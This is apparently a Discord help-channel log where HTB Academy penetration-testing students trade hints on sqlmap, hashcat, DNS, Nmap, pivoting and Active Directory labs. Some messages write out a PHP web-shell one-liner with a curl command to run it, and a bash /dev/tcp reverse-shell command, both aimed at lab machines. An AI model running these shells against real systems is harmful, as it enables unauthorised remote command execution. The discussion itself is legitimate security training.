#modules

1 messages · Page 55 of 1

devout cliff
#

it was a problem with a combination of not the right exploit, wrong payload, wrong ip 😛

#

and me flipping between them trying to troubleshoot and not finding the right combination

fathom pendant
#

AH

#

yeah

#

lol

devout cliff
#

you wanna talk about a sanity check

#

6 HOURS LATER

#

i was working on JUST that host

#

for that long

fathom pendant
#

if you need help with either of the other hosts if you don't have them already :)

devout cliff
#

i did them in sequence

fathom pendant
#

hi what module is this related to?

dim wolf
#

i don't remember there being any modules related to instagram

#

at least in the penetration tester path

devout cliff
fathom pendant
#

igshid is instagram share id if you're wondering

#

click/link tracker

#

googled it :)

dim wolf
#

oooh

vital adder
#

you mean grabify link?

#

also i don't think this is that because the link is instagram domain

fathom pendant
#

EITHER WAY

#

off-topic

#

This link does not belong here :)

vital adder
#

yeah he's just trying to flex his small pp setup

low vine
#

Hey guys working through SQLMAP module and having a hard time understanding how to use this well so far. I've gotten it to spit out and show 5 vulnerabilities for questions #1 Whats the contents of table falg2? (Case #2)

I see the option to dump all tables and certain table names but having a hard time how to add that to the request. I've initially run
Copy command as curl and switched to sqlmap as it show.

vital adder
graceful rampart
vital adder
#

both cringe and dumb

graceful rampart
#

Man had a stroke while he was writing lmao

devout cliff
#

i had a stroke reading that

#

can you tell

graceful rampart
#

Lool

dim wolf
graceful rampart
#

Lmao

low vine
vital adder
low vine
#

Yea let me keep reading just trying to wrap my head around it a bit. Feels slight overwhelming /confusing at first

dim wolf
vital adder
#

jesus christ even if he cheat 1600+ task in 1 day?? oh way he must use a bot or something

low vine
fathom pendant
vital adder
#

yeah i may ask thm mod about this

fathom pendant
#

@novel matrix

vital adder
#

i think you are right on the 12 yo 🤣 half of his face reflect on one of the instagram image

deft mural
#

yo if anyone wants some tools hit me up in dm's

vital adder
#

big poppa Jabba is on your ass

magic valve
#

Could I please get a hint for the password attacks medium lab? I am on the box as the user j.… I see what’s running on the box but unable to login with already found creds on the found services running

vital adder
#

hint check ||the key||

magic valve
#

Checked … key for user j..non existent in his home directory. No access to user d for … key

vital adder
#

oh wait sorry wrong user

vital adder
#

shoot me a dm on what issue you are having

magic valve
radiant marten
#

I'm stuck at Active Subdomain Enumeration and finding the TXT record ! I've tried "dig txt {subdomain}:{sub IP} and get nothing back if I try zone transfer with this domains and IP's i just get transfer failed... what am I doing wrong ? any hints are greatly appreciated !

vital adder
#

pls say what module you are in next time but hint you have to use dig txt (subdomain) @(target machine ip) because all subdomain ip are dead so you can only use the given target machine and also a zone transfer (on the right subdomain) will give you the flag for this question and some more subdomain

#

also because all subdomain ip is dead it's not recommended to use tool for live host like nslookup

valid sinew
#

Hi Guys hope your well. I am stuck on Common Web Vulnerabilities. So the question is -

To which of the above categories does public vulnerability 'CVE-2014-6271' belongs to?

I check the hint and it says the following
It's on of the above! Simply search for the vulnerability description and read about it, and you'll know the answer.

So I read the description but does not give any indication of the category.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

I have tried
-GNU Bash
-Bash Linux
-OpenSSH
-sshd
-mod_cgi
-mod_cgid
-Apache HTTP Server

No luck if anyone can help that would be great?

Many Thanks

candid juniper
#

Hey, is there a command to download the openvpn key on a personal VM without going to the relative webpage? The web instance doesn't seem to want to start and might as well practice using commands more as I'm rather new. Thanks in advance!

vital adder
#

for that nope

dim wolf
vital adder
dim wolf
#

there's no other way than to download it from HTB academy but if you don't want to download it on the VM you can do the shared folder method

valid sinew
candid juniper
#

Alright thanks!

vital adder
fathom pendant
valid sinew
vital adder
#

none of that is given in the section

valid sinew
#

Have i got the correct description

vital adder
#

nope

valid sinew
# vital adder nope

Ok so the hint says It's on of the above! Simply search for the vulnerability description and read about it, and you'll know the answer. Is it in that section

vital adder
#

yep "one of the above" mean one the the categories showed in the section

valid sinew
#

ok let me look into this and come back to you

acoustic owl
vital adder
#

i just check that one how tf did i miss it 🤣

valid sinew
#

As i was there that is where i got the description from but @vital adder is saying its on the page.

vital adder
#

because this module spoiler give me a sec i'll dm you

acoustic owl
#

@vital adder is absolutely right. The solution is on the page

valid sinew
#

Thanks guys i got it.

#

Do you guys work in cyber secuirty

#

as a job?

vital adder
vital adder
valid sinew
#

Sorry all done now

visual quail
#

Hey all, I am working on the hashcat academy module. I am stuck on the "working with rules" section. I have tried running this command and a couple others like it "sudo hashcat -a 0 -m 100 <HASH FILE> <ROCKYOU WORDLIST> -r <RULE FILE>"
In the rule file I have it set as "$2$0$2$0". It keeps on telling me that it is exhausted. Can someone help point me in the right direction?

dim wolf
#

$1-4 are user defined wildcards

low vine
#

is academy down?

#

cannot connect to the box/ have reset HTBA/ Have reset the box

visual quail
#

If I add --stdout on the end of the hashcat command it prints the contents of the rockyou.txt wordlist with 2020 appended to the end of each entry so I dont think that it is the rule

autumn pilot
#

stop your proxy

acoustic owl
low vine
autumn pilot
#

stop it then

low vine
#

ive also tried on other ones its not on

autumn pilot
#

if you see this, it means that somewhere the request is being intercepted

low vine
#

Yea i've killed everything

#

Okay ill just reset the vm

#

and try

visual quail
acoustic owl
#

|| $echo 'so0 si1 se3 ss5 sa@ c $2 $0 $2 $0' > rule.txt ||

fathom pendant
#

Pivoting/Portforwarding/Tunneling is one I think I need to take one chunk at a time it make my tiny brain hurt

#

are you running that sqlmap command or are you running it against a spawned target?

low vine
#

its running against a spawned target

#

sqlmap -u "http://ip/?id=1" --banner --current-user --current-db --is-dba

deft fractal
#

For some reason i can't ping target, even from within pwnbox

cyan oar
#

ls

#

ls

woeful ermine
deft fractal
alpine nymph
#

Hello guys

#

Am in urgent need

#

Pls answer

#

@everyone

dim wolf
#

trouble with an htb academy module?

alpine nymph
#

No lol

dim wolf
#

then go somewhere else :)

alpine nymph
#

Does anybody have a link or know how to hack professionaly

last cape
#

^

alpine nymph
#

Oh my bad

#

But u guys offer hacking lessons

#

And tips

dim wolf
#

are you requesting a service?

alpine nymph
#

Yes

dim wolf
#

in what way?

alpine nymph
#

Hacking

#

Ik how to dox

#

But takes too much time

dim wolf
#

sorry, nobody here will take you up on your request.

alpine nymph
#

But u guys give hacking tips

dim wolf
#

sure, but we deal with ethical hacking

#

now i would suggest taking business elsewhere so the channel doesn't get clogged

alpine nymph
#

Aight

#

Sorry for bothering

plucky pollen
#

hello house

fathom pendant
chilly cosmos
#

Hello, I am the module CROSS-SITE SCRIPTING (XSS) and i am stuck at xss discovery, I try different answer on both question don't if i can have help. Thank You

plucky pollen
#

okay i'm tryin to locate the bash! in HTB ACADEMY can someone help me!

deft fractal
#

Ok, Ive checked different module 'File Inclusion' and it works, problem only with 'Intorduction to windows command line'

plucky pollen
#

sorry i still don't understand please

queen hatch
deft fractal
#

doesn't work only for one module the windows one, works fine with file inclusion module, both from pwnbox or my system thru vpn

#

i can check other modules if needed

queen hatch
#

File Inclusion doesn't use Private IPs (10.). Its using public ones

deft fractal
#

oh ok

queen hatch
#

So my guess is that something is wrong with your VPN. Make sure you're connected. You should be able to see a tun0 interface if you run ip addr in terminal

deft fractal
#

nope its using privet one

#

10.129.29.112 spawned

queen hatch
#

Or run ip route and you may see your the IP you want to get to in the routes

deft fractal
#

linux fundamentals module also responding very nice

queen hatch
#

Ah I see. There are a couple sections that use Private IPs. I've had to download a different VPN config before (us-academy-1 / us-academy-2) and refresh the target before

deft fractal
#

ive tried all 4 free ones already, even switched between tcp and udp

queen hatch
#

Last week, I had to switch from us-academy-1 to us-academy-2. Not sure why. us-academy-1 is working now though

deft fractal
#

pitty i was enjoying this windows stuff, realised how little i know

queen hatch
#

Sorry I'm not more help. I don't have that module unlocked or else I'd fire it up to check

deft fractal
#

No worries! Thanks for help!

elfin nacelle
#

Good evening, I just cant find the path to the second flag in the SQLMAP MODULE ESSENTIALS question: "Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host."
Ive tried using the script:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Verified the upload with:
curl http://165.22.123.238:30635/shell.php?cmd=ls+-la
changed cmd=ls+-la in the above url to to cmd= dir /
and tried navigating through the directories to locate the other flag.
The question hint says "The flag is in a very common directory"

#

Can someone help specify the directory of the second flag, nudge me in the right direction, or dm me?

visual moat
#

Can someone help me with the Archetype box?

thorn urchin
#

no

rugged veldt
#

for the footprinting medium module, is 'nobody' suppoused to be the owner of the mounted directory?

#

cannot seem to access it after switching to the user, the UID is the same in passwd

fathom pendant
tight mesa
#

Im trying to cURL , but it appears that my machine is broken. It won't display the results. My input is either curl 134.122.103.40 -v or curl 134.122.103.40:31440 -v, but it justs stuck saying trying 134.122.103.40:80. Any advice?

queen sparrow
#

I have a question about a beginner module I'm stuck on. Is this an appropriate place to ask?

tight mesa
#

Nevermind actually, it just worked after 30 minutes of trying face palm

rugged veldt
tight mesa
fathom pendant
queen sparrow
#

It's dumb. Fawn. My issue is, I'm connected via VPN, it wants me to be before I can spawn machine-- easy. But it thinks the Fawn machine is already active so I can't spawn it. Is there a way to close all of my active machines?

fathom pendant
#

Fawn is a box in the starting point machines list; you can verify your account in #bot-commands by typing in ++verify and ask your question in #starting-point or using the search feature in the top right of discord search if your question has been answered. YOu can also try and get in touch with support by expanding that lefthand menu and clicking on "Contact Support"

fathom pendant
#

:)

#

also google "what does 'sa' stand for in windows account name" :)

#

or specifically what does sa stand for in sql

rugged veldt
#

or

#

system administrator

fathom pendant
#

but the last few things i mentioned are just more for further exploration; you have all the info to get what you need

rugged veldt
#

the certificate chain was issued by an authority that is not trusted

#

😭

fathom pendant
#

i mean

rugged veldt
#

after connection was established with server

fathom pendant
#

that's fairly standard when remoting in on htb machines

rugged veldt
#

login failed

#

😭

fathom pendant
#

are you using 'Administrator'?

rugged veldt
#

yes

fathom pendant
#

are you trying to rdp in with admin?

rugged veldt
fathom pendant
#

Gl then you should have it from here

#

Should be able to access the sql manager with him

#

And creds

rugged veldt
#

yup just got in that

#

sweet tyvm

fathom pendant
#

Np

#

Happy hunting: mssql is a pain fyi

rugged veldt
#

got it @fathom pendant tyvm

queen sparrow
#

#starting-point doesn't seem to exist

#

I'll just wait til support comes back tomorrow

storm dagger
queen sparrow
#

i did

dim cosmos
#

hi everyone

tight mesa
#

This is the question: First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.

runic hill
#

Has anyone completed noSQL injection Skills Assessment II? I tried everything in the module and failed. Can someone give me some advice

red current
#

I'm having an issue getting the second question answered in the Automating Payloads & Delivery with Metasploit in the Shells and Payloads module. I can't seem to find the right method for authenticating into the target machine.

raw heath
#

Help! Having issue with -exec ls -al in my string, says missing argument to ‘-exec’

radiant marten
low vine
#

Having some more sqlmap troubles (questionj #2).
We know that the cookie is intentionally vulnerable and I dont understand why everything I run says its not vulnerable.

I'm using sqlmap -r file.text --data="Cookie: id=1"
Also trying --cookie as well and everything shows as not vulnerable

#

Thought sqlmap would be a breeze but this is kicking my ass

woeful ermine
#

yep you need to figure out what works. If you ve got a cookie, you definitely need to put that

low vine
#

Did figure it out with some help Note that also the HTTP Cookie header is tested against SQL injection if the --level is set to 2 or above. Read below for details.

woeful ermine
#

it's weird, It is mentioned in later sections. But sometimes checking later sections helps

low vine
#

My brain was hurting....I reread a bunch and just did not understand why I was not able to do it

woeful ermine
#

felt the same

#

in my first times

low vine
#

Big ass highlight in the notes lol

#

I was also being dumb and putting in --data when its not a post request

#

< but we got through it eventually

woeful ermine
#

it just takes a bit of time

dusky bear
#

Can someone break down this reverse shell command in english?

sh -i >& /dev/tcp/10.10.14.107/1337 0>&1

Just trying to understand how this establishes the reverse shell from the target

#

I get the call out to the IP / port. But having trouble with the & redirect

low vine
#

@dusky bear use explainshell

woeful ermine
#

there is also a module explaining that

dusky bear
woeful ermine
#

shells and payloads I guess

low vine
#

exlpainshell and chatgpt does a great job explaining alot of stuff in plain english.

woeful ermine
#

let me ask it chatgpt

graceful rampart
#

Yea. ChatGPT is goated for explaining pretty much any piece of code or command you'll ever need explained

thorn lichen
#

Hi, anyone can lend a hand for "Skill Assessment - Broken authentication"?

woeful ermine
rustic sage
cloud skiff
#

I try to download pwndoc but I get this error -```] {
opensslErrorStack: [ 'error:03000086:digital envelope routines::initialization error' ],
library: 'digital envelope routines',
reason: 'unsupported',
code: 'ERR_OSSL_EVP_UNSUPPORTED'
}

Node.js v18.14.0
The command '/bin/sh -c npm run build' returned a non-zero code: 1
ERROR: Service 'pwndoc-frontend' failed to build : Build failed

How do I resolve this error?
#

and also this --> Error: error:0308010C:digital envelope routines::unsupported

#

When I run this command --> sudo docker-compose up -d --build

solid sage
#

Hi everyone ! if someone can help on the module « Password attacks » I’m stuck with the Will and Kira credentials. I tried few things but nothing seems to happen

fathom pendant
#

Refrain from posting flags in your post :)

fathom pendant
#

note the users do come up quite a bit so saving their password somewhere isn't a bad idea

native gull
#

hello

hallow swift
#

Hello! can someone please help me on the module "Information Gatherin - web edition" in the section "Web skill assessment" in the last question! Please! 🙂

placid quest
#

@hallow swift what is the last question

hallow swift
placid quest
cloud skiff
#

module - setting up
section - organization
issue related to PS1 variable
question - where do I put PS1 variable in .bashrc file to display the date and time.

hallow swift
placid quest
hallow swift
alpine dome
#

Any help with the DNS quiz at Attacking Common Services? I have already discovered some subdomains using subbrute (cl and h*k with their IPs), however I can not proceed from there. Zone transfers are not allowed.

placid quest
#

@alpine dome how

alpine dome
#

I have used dig as a first step, discovered ns.inlanefreight.htb and moved on with subbrute.

placid quest
#

Ok, you are trying to look for zone transfer or

alpine dome
#

I can not do any zone transfers. It fails.

#

I have restarted the box multiple times.

placid quest
#

That means zone transfer is not allowed

alpine dome
#

The other step is bruteforcing, which has revealed two subdomains with unreachable IPs

woeful ermine
#

try putting main domain to resolver list other than the ns

#

hmm unreachable ips

placid quest
#

@alpine dome put the ip address in resolver and try to brute force the subdomain

alpine dome
#

I think I have tried that as well. I will try it again.

woeful ermine
#

what do you mean by unreachable ips?

placid quest
#

@alpine dome like this python3 subbrute.py inlanefreight.htb -s /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt -r ./resolvers.txt

alpine dome
#

Yep, tried various wordlists as well.

#

Let me give it another shot.

#

Honestly, Academy is a huge waste of time sometimes.

placid quest
#

@alpine dome it would be easy if u first delete all ip address that are in resolver.txt before u add in your ip address

alpine dome
#

The whole "try harder" mentality in this field has gone beyond toxic.

woeful ermine
#

hahaha

#

my dig didnt work with that section also there are other people had the same problem

alpine dome
#

In the previous module, I had to waste 30 mins in each task to crack a password.

woeful ermine
#

I ssh to server and get the info that way

alpine dome
#

I mean you can do it in one task, but spending 2 days in such a huge module waiting for passwords to crack? Is this supposed to be educational?

alpine dome
placid quest
#

Some times try harder kills me

alpine dome
#

The thing is that I want to take the exam but I can not do so before I complete the path. I have to spend hours trying to figure out what was the creator thinking.

placid quest
#

@alpine dome me too i want to take exam

placid tusk
#

hii

#

i am new hear

rugged veldt
#

for the hard lab in footprinting, how do i know that there is a mysql server running on the machine when i connect as ||tom||

#

i read somewhere that mysql is running, but what command can i run to view this?

alpine dome
#

use netstat -ano

#

and find the port 3306 running locally

#

privesc technique

rugged veldt
#

thanks

woeful ermine
alpine dome
#

In all due respect, I love HTB and I have learned and keep learning tons of it. But the academy modules are simply hard and vague just for the sake of it.

woeful ermine
alpine dome
woeful ermine
dim cosmos
#

about to do the windows priv esc skills assessments, i can tell it will hurt my brain already 😛

#

agree about the occasional hint being mandatory is annoying, and sometimes working your way through different wordlists is annoying, but overall it is great content. just get on with it

#

everyone is helpful in here, you'll never get stuck for too long

sleek urchin
#

hello again, I am still stuck at SQLMap Essentials: Skills Assessment

#

I have looked at the forum.hackthebox for this Skills Assessment, and I have done everything from simple stuff to hard-complex stuff, but have a look at commad and you you cam find my mistake(s)

#

sqlmap -r req.txt --technique=S -D testdb -T final_flag --dump --tamper=[tried all of them] --skip-waf --no-cast --level=[tried from 0-5] --batch

#

and tried scanning for tables, and nothing really was usefull

woeful ermine
#

well, not sure. But, I havent used this many flags at the same time

sleek urchin
woeful ermine
#

why are you looking into testdb?

sleek urchin
true belfry
#

You don't need so many flags and play with -v. That'll give you something to work with

woeful ermine
#

first get the database names. step by step

sleek urchin
woeful ermine
#

or if you dont mind waiting, as it is time-based. You can dump it all

sleek urchin
woeful ermine
#

you are welcome

placid quest
#

@sleek urchin check in your dm

autumn pilot
#

For those doing the AD Enum & Attacks assessments an advice - refer to ligolo if you think that you need to port forward something, it will make the steps quite a bit easier

zenith gazelle
#

In the dns footprinting the hint says "Remember that different wordless do not always have the same entries", the last part "same entries" what is supposed to mean in this context? (I'm trying to brute force a domain using dnsenum)

marble geode
#

Guys is it the place where you post your questions about the modules you practices with if you stuck somewhere? I just enrolled with silver annual, and it says there will be lab guidence via discord, should I expect someone from HTB Academy officials or this channel is what I am looking for?

zenith gazelle
fathom pendant
marble geode
#

thx a bunch!

fathom pendant
#

Imo one-on-one is kinda a meh selling point

woeful ermine
#

have you ever used that

fathom pendant
#

Well I say it's meh when this channel exists

#

Like yeah you're not gonna get 1-1 unless someone DMs you about it. But a LOT of the common questions/issues have been asked and answered here if you know how to utilize discord search feature

woeful ermine
#

sure. But still got curious about it. haha

fathom pendant
#

The biggest selling point for me with silver annual would be : exam voucher, t0-2 modules full access

marble geode
#

hmm, that kinda popup first time after i enrolled silver, guess I just need those cudes to unlock module and voucher I gotta use for exams later, still good to have 1 on 1 tutorial, wouldnt hurt to have those accelerators

#

right

woven sparrow
#

anyone that can give me some help on Footprinting Lab - Hard, I got the key from imaps. Like most others, I get the "Load key "id_rsa": error in libcrypto, Permission denied (publickey)" error. I have used chmod 600 on the key. Command I use: "ssh -i private_key ***@10.129.1.1" in the same folder as the key.

fathom pendant
fathom pendant
#

Sometimes it not working is a weird quirk of text editors

woven sparrow
fathom pendant
#

Lol I'd say copy paste again and double check you have it copied fully

#

Including the ---START and ---END , lines

zenith gazelle
fathom pendant
#

chatGPT can also be confidently incorrect

marble geode
#

bummer Lol

fathom pendant
#

Like you can ask it about specific command syntax meaning but further than that is where it can fall apart

woeful ermine
#

what did you ask?

fathom pendant
#

Also afaik chatGPT is barred for the exam

#

👀 hey tux

woeful ermine
#

its a bit weird how would they know if you used it or not

#

you can connect with a different network with a different pc. Even if someone hacked your whole network which I dont think so

fathom pendant
#

Part of the exam is writing a report :)

woeful ermine
fathom pendant
#

Yes barred/prohibited

woven sparrow
fathom pendant
#

Hmm

odd dawn
#

Hey I was wondering, what are those mini modules in the academy? I know there are none available at the moment hahah, but can anyone give some insights as to how they gonna work or what content will they have?

fathom pendant
#

Try updating/upgrading your VM os

fathom pendant
odd dawn
#

Yeah lol, I was honestly wondering cause I think it's already there a couple weeks but there's nothing in there 😅

#

I'll wait for his answer, thanks ☺️

shadow canopy
#

stuck at active directory skill assessment part 1
got s*_s* creds and bloodhound but couldn't connect to sql through proxychains. not sure how to get to ms01 from WEB-WIN01
tried evil-winrm and nmap host discovery through proxychains but no luck
anyone can give a nudge

pseudo kiln
#

Hey Guys,
I'm trying to play with the new module : Abusing HTTP Misconfigurations
I'm having trouble with the Advanced Cache Poisoning Techniques.
I've setup the vhosts fatget.wcp.htb and cloack.wcp.htb but I can't make the payload work in any of them.
I believe there is something wrong in the server as I should have the Python web framework Bottle for cloack.wcp.htb and wappalyzer is returning PHP.
Can anyone from staff confirm/help ?

solid sage
gray blade
#

Hello ! Someone could help on rdp socks tunneling with socks rdp. I have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155

zenith gazelle
#

It is possible to change the photo of the profile in the htb academy?

autumn pilot
#

possible - yes; tricky - also yes

autumn pilot
#

not quite

#

bring up the inspector tool and you will find more about the avatars

dim wolf
#

oh no

#

we meet again gravatar

zenith gazelle
iron basin
#

Password Attacks - Pass the Ticket: I am stuck on the last question but believe I am close to figuring it out. However, I am wondering if I have to find a way to get root level access in order to complete this question or if there is another way to read the file I need to read. Any hints or help?

latent umbra
#

hack the box is asking submit root flag what to write in the answer box i didnt found answer

iron basin
#

@latent umbra You have to find the flag.txt on the machine you are working on

hybrid nymph
#

In the ACL enumeration portion of the Active Directory enumeration module for Pentester path, what is the answer to the last question of rights forend has over GPO Management group, given that the search apparently takes 30 minutes and bloodhound isn't giving the answer.

#

Thank you for your help.

#

Also, does anyone have a conprehensive list of ACEtypes? why doesnt microsoft provide one?

summer gulch
#

hi anyone here

hybrid nymph
#

Thank you, with the initials frlm the forum I got it

#

What a waste of time

bleak apex
#

Hi there is a question on the NMAP module "Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result. ". I tried all the Operating system namesYour and no one shows in right. You help will be highly appreciated.

bleak apex
#

Parrot
ParrotOS
Parrot Security

bleak apex
#

Linux

#

Debian

iron basin
light cedar
#

guys im sorry, i just wanna know i submitted my first user flag, and I'm happy with that I wanna share it but the share result is not clickable , why 😦

iron basin
#

@light cedar Not sure but congrats! What machine?

iron basin
#

Ayeee

#

Wait is that a htb machine or what? Was trying to look at it

light cedar
#

yea htb machine

#

it's disapointing that i can' t share my result with my people

bleak apex
#

Guy,s can anybody help me answer my question?

gray blade
#

Someone could help on rdp socks tunneling with socks rdp. I have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155

bleak apex
#

@gray blade can see any os name. Am I not doing the things right ?
sudo nmap 10.129.2.28 -sV

fathom pendant
#

@light cedar @iron basin this channel is for questions regarding modules on hackthebox academy; you can verify your account in #bot-commands

fathom pendant
fathom pendant
bleak apex
#

Thanks. Trying with those options. It seems my target machine is down

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
bleak apex
#

Thanks.

zenith gazelle
bleak apex
#

Not sure is there way to put screenshot on the discord chat. I get

Too many fingerprints match this host to give specific OS details
#

Am I doing it right ?

sudo nmap 10.129.2.28 -O -sV -Pn
zenith gazelle
#

Try everything that the room teaches, -sn, --disable-arp-ping,-A etc...

bleak apex
#

Thanks

gray blade
#

Can i have help on rdp socks tunneling with socks rdp please ? ^^

zenith gazelle
gray blade
#

Im stuck, i have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155

#

With jason user

bleak apex
#

@zenith gazelle I could not make it work yet. Does not show OS info.

zenith gazelle
#

In what section are you exactly?

bleak apex
#

At the end of "Host Discovery"

gray blade
#

rdp socks tunneling with socks / forwarding

fathom pendant
#

But also if you take a look at the version of one of the services you can make an educated guess

bleak apex
#

Thanks @fathom pendant

zenith gazelle
#

In what section are you exactly?

gray blade
low vine
#

question on resources for visualizing SQL queries? I'm working on SQLmap - Attack Tuning #2 and I'm not understanding the process / steps I should look and and take to figure out what these non-standard boundries are

bleak apex
zenith gazelle
bleak apex
#

Can anybody see what the OS here?

gray blade
#

Yes but you should find thé os name

bleak apex
#

Thanks @gray blade . I am trying with this -

sudo nmap 10.129.2.49 -O -sV -Pn --disable-arp-pin
gray blade
autumn pilot
#

have you tried including safe scripts, perhaps it can help you determine the thing you need

bleak apex
#

Hi @autumn pilot could you help how can Ithe i do with safe script ?

autumn pilot
#

also I can see the answer in the output that you have provided

zenith gazelle
bleak apex
autumn pilot
#

Read the question in the exercise again, you will notice your mistake

bleak apex
#

It says "Based on the last result, find out which operating system it belongs to"

I gave -
Ubuntu
Linux
Parrot
ParrotOS

Nothing right.

thorn urchin
#

sounds like youre guessing

autumn pilot
#

look at the "Scan Network Range" snippet and focus on the ICMP packets

thorn urchin
gray blade
#

Someone could help me on rdp socks tunneling with socks rdp. I have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155

bleak apex
#

As nothing says right I started guessing which is not right though

placid quest
#

@bleak apex why everything you mentioned is linux and icmp packets are same

bleak apex
autumn pilot
thorn urchin
#

I know youre new, I was wanting you to examine your thought process that lead you to your answers. If youre just guessing though thats never going to be helpful. Even if you guessed right you wont know why youre right and will have cleared the section without learning.

bleak apex
thorn urchin
#

Write out whats puzzling you

autumn pilot
bleak apex
#

As per the report the OS is Linux ? But it does not say it right.

Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 19:52 GMT
Nmap scan report for 10.129.2.49
Host is up (0.077s latency).
Not shown: 993 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp   open  pop3        Dovecot pop3d
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
31337/tcp open  Elite?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/14%OT=22%CT=1%CU=40397%PV=Y%DS=2%DC=I%G=Y%TM=63EBE74
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST1
OS:1NW7%O6=M539ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Host: NIX-NMAP-DEFAULT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
autumn pilot
#

okay, let's go back a few steps

#

on which module and section you are currently working

bleak apex
#

Module: Network Enumeration with Nmap
Section: Host Discovery

thorn urchin
#

That section doesnt have a lab, what are you scanning

#

it just has a question

autumn pilot
#

Host discovery doesn't have a target, from where have you obtain that output

bleak apex
#

@autumn pilot Thanks I got it. You are completely right with that chart. Many thanks !!!

autumn pilot
#

np young padawan

shadow canopy
#

anyone did the active directory skill assessment 1. i need a nudge. found creds but couldnt connect to ms01

  • AD Enumeration & Attacks - Skills Assessment Part I
  • Submit the contents of the flag.txt file on the Administrator desktop on MS01
    proxychains evil-winrm -i <internal-ip> -u <username> -p <password>
    proxychains xfreerdp /u:<username> /p:<password> /v:<internal-ip>
autumn pilot
#

is that from Enum & attacks?

shadow canopy
#

yes AD enum & attacks

autumn pilot
shadow canopy
#

thanks ill try ligolo. i been doing it with chisel

autumn pilot
#

for MS01 I think I used the hash rather than the password skill assessment 2

thorn urchin
#

Ive heard good things about ligolo but I cleared both sections fairly well with chisel

shadow canopy
#

when i try this command powershell hangs. $password = ConvertTo-SecureString "password" -AsPlainText -Force $cred = new-object System.Management.Automation.PSCredential ("domain\target-username", $password) Enter-PSSession -ComputerName hostname -Credential $cred
also
.\mimikatz.exe

steep loom
#

can anyone be of assistance with the documentation & reporting skills assessment? I have a bunch of user names and passwords at this point but don't really know what to do with them. Feel free to DM me 🙂

#

also what is the answer to: " Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)" Is it not [B] + [Shift] + [%] ?

dim wolf
static roost
#

Super confused about some PHP presented in the 'File Upload Attacks' module. I completed it yesterday; now I'm going over the process from a blue team perspective. I don't want to post the code here as to avoid spoilers. Can someone pm me plz?

true belfry
#

@static roost DM me, I just finished the module the other day. Maybe I can help

flint laurel
#

Does anyone know what to do for Network Enumeration hard 🤔? Been stuck on this for days now

flint laurel
silver zenith
#

Htb should make a module about social engineering

#

How to defence yourself from it

#

And reconize it

shadow canopy
empty ember
#

👍

raven cairn
#

Can I have help with the final question of Password Attacks Pass the Ticket (PtT) from Linux?

#

I'm in root, and I ran linikatz, but i have been having trouble sinc there

fathom pendant
fathom pendant
#

Specifically the daemon that connects it

raven cairn
#

|| cuz I keep getting NT_Status denied when i try to use smbclient with files from /tmp ||

thorn urchin
#

linux kerberos tickets are just files

fathom pendant
#

Etc.

#

I think

#

Either way there's a client that runs kerberos, that may help you

raven cairn
#

Got it

#

Thanks for the help!

#

I didn't look at the instructions in the module close enough

raven cairn
#

could I also have a sanity check for attacking common services 'Attacking SQL Databases'?

#

i know this section was haivng issues in the past

thorn urchin
#

I had no luck with sqsh. had to use mssqlclient

raven cairn
#

and i tried that too lol if you look at the picture

#

And i am very confident i entered the right password. Tried this multiple times

maiden surge
#

:wq!

raven cairn
thorn urchin
#

are you sure thats the right user

raven cairn
#

damn

raven cairn
fathom pendant
rustic sage
#

If I cancel my HTB academy subscription for a while to focus on my academic studies, would my progress be lost?

fathom pendant
#

Any modules you completed stay completed

rustic sage
solid quarry
#

Can someone help me in crackmapexec skills assessment first question, I think I'm doing something really stupid

sly tapir
#

